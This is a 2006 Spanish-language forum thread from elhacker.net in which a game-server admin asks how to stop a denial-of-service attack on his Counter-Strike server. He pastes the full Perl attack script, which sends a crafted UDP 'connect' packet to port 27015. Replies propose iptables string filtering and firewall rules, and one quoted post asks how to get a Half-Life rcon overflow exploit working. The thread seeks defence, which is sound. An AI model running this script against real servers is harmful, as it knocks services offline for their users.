elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
25 Mayo 2012, 18:22  


Tema destacado: Entra al canal IRC oficial de #elhacker.net

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  Me tiran el servidor con un exploit
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Me tiran el servidor con un exploit  (Leído 2,902 veces)
Leazxcv

Desconectado Desconectado

Mensajes: 8


Ver Perfil
Me tiran el servidor con un exploit
« en: 6 Agosto 2006, 12:09 »

Buen les comento, tengo un servidor y por este exploit que abajo está me lo tiran abajo, y practicamente a la gente le sacan las ganas de jugar xq terminan saliendo todos del mismo. Los servidores no estan en linux, quisiera saber si hay alguna forma de solucionar esto xq me stoy volviendo loco, el servidor es no steam, probe tirar en general para ver como funcionaba y sin embargo habian servidores que no me dejaba tirar es decir me dice que no tengo autorizacion. Buen abajo lo dejo a ver si alguien tiene una posible solucion. Saludos

use IO::Socket;
die "usage: ./csdos <host>" unless $ARGV[0];
$host=$ARGV[0];

if (fork())
{       econnect($host); }
else
{ econnect($host); };
exit;

sub econnect($)
{
        my $host=$_[0];
        my $sock = new
IO::Socket::INET(PeerAddr=>$host,PeerPort=>'27015',Proto=>'udp');
        die "Could not create socket: $!\n" unless $sock;
        $cmd="\xff\xff\xff\xff";
        syswrite $sock, $cmd."getchallenge";

        sysread $sock,$b,65535;  print $b,"\n";
        @c=split(/ /,$b);

        $c2=$c[1];

        $q=$cmd."connect 47 $c2 \"\\prot\\4\\unique\\0\\raw\\valve\\cdkey\\f0ef8a36258af1bb64ed866538c9db76\"\"\\\"\0\0";
print '>',$q,"\n";
syswrite $sock, $q;
sysread $sock,$b,65535; print $b,"\n";
sleep 3;
close $sock;
}


Un conocido me dijo que use iptables para filtrar las conexiones que manden ese string, osea yo 0 idea de esto.

en teoria me dijeron que tendria que ser algo asi:

iptables -t filter -A INPUT -i $INTERFAZ -p tcp -d $IP --dport $PUERTO -m string --string "connect 47 $c2 \"\\prot\\4\\unique\\0\\raw\\valve\\cdkey\\f0ef8a3 6258af1bb64ed866538c9db76\"\"\\\"\0\0" -j DROP

------------------------------------------------

Post por: BenRu

He estado mirando acerca del exploit, y te va a costar un poco de trabajo xD

Half Life (rcon) Remote Buffer Overflow Exploit

Alguna idea chicos? yo ni idea, necesitaria una forma de como ponerlo en funcionamiento si es que alguien tiene una ida.
En línea
el-brujo
ehn
***
Desconectado Desconectado

Mensajes: 17.232


La libertad no se suplica, se conquista


Ver Perfil WWW
Re: Me tiran el servidor con un exploit
« Respuesta #1 en: 6 Agosto 2006, 12:25 »

si usas windows, el iptables de poco te va a servir jejeje

Usa el firewall de Windows u cualquier otro para bloquear las peticiones al puerto 27015 65535 UDP, aunque no se si ese puerto lo necesitas para el CS.

Entonces si que tendrás que filtrar por el "string" y cuando te envien la cadena dañina deberás bloquear esa petición.
« Última modificación: 6 Agosto 2006, 12:28 por el-brujo » En línea

"elhacker.net es único, por eso no fabrica para otras marcas"  - Prohibido prohibir

дٳŦ٭
GNU/Linux Infrastructure Specialist
Ex-Staff
*
Desconectado Desconectado

Mensajes: 5.089


Mtz De C.


Ver Perfil WWW
Re: Me tiran el servidor con un exploit
« Respuesta #2 en: 6 Agosto 2006, 13:54 »

Instala un firewall que te filtre los paquetes, bajate el karpesky anti-hacker ;)

Lo recomiendo  :P
En línea



Con sangre andaluza :)
Leazxcv

Desconectado Desconectado

Mensajes: 8


Ver Perfil
Re: Me tiran el servidor con un exploit
« Respuesta #3 en: 6 Agosto 2006, 21:10 »

Cabe aclarar que es privado el servidor, osea esta en otra parte.
En línea
Codename!!


Desconectado Desconectado

Mensajes: 881



Ver Perfil
Re: Me tiran el servidor con un exploit
« Respuesta #4 en: 12 Agosto 2006, 18:05 »

Instala un firewall que te filtre los paquetes, bajate el karpesky anti-hacker ;)

Lo recomiendo  :P

Ami el antihaker me tira pantallazos azules de windows por la conexion wireless, se ve que no son muy amigos la konexion y el firewall xddd
En línea

No te dejes mover por las masas, se tu mismo.




Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Problema con un exploit dentro de mi servidor el cual suben y luego borran
Bugs y Exploits
CuriosO 3 1,039 Último mensaje 20 Febrero 2011, 14:25
por Lunfardo
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines